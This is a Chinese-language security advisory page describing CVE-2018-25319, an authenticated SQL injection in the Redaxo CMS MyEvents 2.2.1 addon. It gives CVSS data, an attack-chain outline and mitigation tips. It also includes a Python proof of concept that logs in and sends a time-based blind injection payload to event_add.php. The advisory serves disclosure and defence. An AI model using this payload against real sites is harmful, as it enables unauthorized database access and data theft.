IPBUF安全漏洞报告
English
CVE-2018-25319 CVSS 7.1 高危

CVE-2018-25319 Redaxo CMS MyEvents插件SQL注入漏洞

披露日期: 2026-05-17
来源: [email protected]

漏洞信息

漏洞编号
CVE-2018-25319
漏洞类型
SQL注入
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Redaxo CMS Addon MyEvents

相关标签

SQL注入Redaxo CMSMyEventsCVE-2018-25319Web安全认证后漏洞

漏洞概述

Redaxo CMS的MyEvents插件2.2.1版本存在SQL注入漏洞。由于`event_add.php`页面未对`myevents_id`参数进行充分的过滤,经过身份验证的攻击者可通过构造恶意的GET请求注入SQL代码。该漏洞允许攻击者操纵数据库查询,从而窃取敏感信息或篡改数据库内容,对系统安全构成严重威胁。

技术细节

该漏洞主要源于Redaxo CMS的MyEvents插件在开发过程中未能遵循安全编码规范,导致输入验证机制失效。漏洞触发点位于`event_add.php`脚本,当该脚本接收通过GET方式传递的`myevents_id`参数时,直接将其引入到后端的SQL查询逻辑中,而没有经过严格的参数校验或过滤。这种不安全的处理方式使得攻击者能够注入恶意的SQL指令。由于攻击需要低权限用户身份(PR:L),利用链通常始于攻击者登录系统,随后向受影响端点发送特制的HTTP请求。攻击者可以利用SQL报错注入、联合查询或布尔盲注等技术,提取数据库结构及敏感数据,如管理员密码哈希、用户信息等,甚至在某些情况下写入WebShell,从而完全控制受影响的服务器。

攻击链分析

STEP 1
侦察
攻击者识别目标系统运行的是Redaxo CMS,并安装了MyEvents插件2.2.1版本。
STEP 2
获取访问权限
攻击者注册或获取一个低权限账户(满足PR:L要求),以便访问需要认证的功能页面。
STEP 3
漏洞利用
攻击者向`event_add.php`发送特制的GET请求,在`myevents_id`参数中注入恶意SQL代码。
STEP 4
数据窃取或篡改
数据库执行恶意SQL语句,返回敏感数据(如用户 hash)或修改数据库内容,导致信息泄露或完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 import requests # CVE-2018-25319 PoC # Target: Redaxo CMS Addon MyEvents 2.2.1 TARGET_URL = "http://target.com/redaxo/index.php" LOGIN_URL = "http://target.com/redaxo/index.php" # Attacker credentials (Low privilege required) USERNAME = "attacker" PASSWORD = "password" s = requests.Session() # Step 1: Authenticate to the application login_data = { "rex_user_login": USERNAME, "rex_user_psw": PASSWORD } s.post(LOGIN_URL, data=login_data) # Step 2: Exploit SQL Injection via GET parameter # Using a time-based blind injection payload for demonstration payload = "1' AND SLEEP(5)-- -" params = { "page": "myevents/event_add", "myevents_id": payload } try: r = s.get(TARGET_URL, params=params, timeout=10) if r.elapsed.total_seconds() > 5: print("[+] Vulnerability confirmed! Response time indicates SQL injection.") else: print("[-] Target does not appear to be vulnerable.") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

Redaxo CMS Addon MyEvents 2.2.1

防御指南

临时缓解措施
在未升级插件前,建议通过WAF(Web应用防火墙)拦截针对`event_add.php`页面的异常SQL语法请求,或暂时禁用MyEvents插件功能以降低风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表